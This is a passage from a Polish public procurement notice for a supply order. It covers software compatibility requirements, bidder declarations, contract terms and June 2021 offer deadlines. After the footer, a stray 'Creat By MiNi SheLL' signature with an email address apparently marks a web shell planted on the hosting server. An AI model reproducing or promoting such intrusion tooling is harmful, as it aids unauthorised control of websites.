teleinformatyczną jednostekpodległych Zamawiającemu.Jeżeli wykonawca zaproponuje inne rozwiązanie niż system operacyjny Windows 10 Pro 64-bit PL lub zgodne zwymienionymi kryteriami równoważności musi zapewnić pełne wdrożenie oferowanego rozwiązania, przeszkolenie użytkowników iadministratorów systemu oraz zapewnić współpracę z używanym obecnie środowiskiem informatycznym.Wykonawca zapewni pełnąkompatybilność (a także bezpieczeństwo, stabilność i wydajność) oferowanego oprogramowania z wykorzystywanymi przez Zamawiającegorozwiązaniami(zwłaszcza w kontekście udziałów sieciowych i uprawnień do nich)w oparciu o system domen w środowisku LAN.2.5.Brakprzedłożenia wyżej wymienionych dokumentów stanowi podstawę do uznania,iż Wykonawca uchyla się od zawarcia umowy w sprawiezamówienia publicznego.2.6.Jeżeli wykonawca,którego oferta została wybrana jako najkorzystniejsza,uchyla się od zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy[jeżeli zabezpieczenia żądano],zamawiający może dokonać<br/>ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić<br/>postępowanie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający bada, czy nie zachodzą podstawy wykluczenia<br/>wobec każdego z tych wykonawców.<br/>2. Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu w postepowaniu – załącznik nr 4 do SWZ<br/>Oświadczenie, o którym mowa wyżej, stanowi dowód potwierdzający brak podstaw wykluczenia, odpowiednio na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3.1.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa wyżej składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3.2.Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich<br/>podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu o którym mowa wyżej.<br/>4.Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, zamawiający<br/>może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych<br/>aktualnych na dzień ich złożenia.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych<br/>środków.<br/>6. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym<br/>etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych aktualnych na dzień ich<br/>złożenia.<br/>7. Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania, sporządzone w<br/>języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>8. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać zamawiającemu przy użyciu środków komunikacji<br/>elektronicznej dopuszczonych w SWZ, w zakresie i w sposób określony w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy<br/>pzp.<br/>8. W zakresie nieuregulowanym ustawą pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020, poz. 2415) oraz przepisy<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 2 do SWZ - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com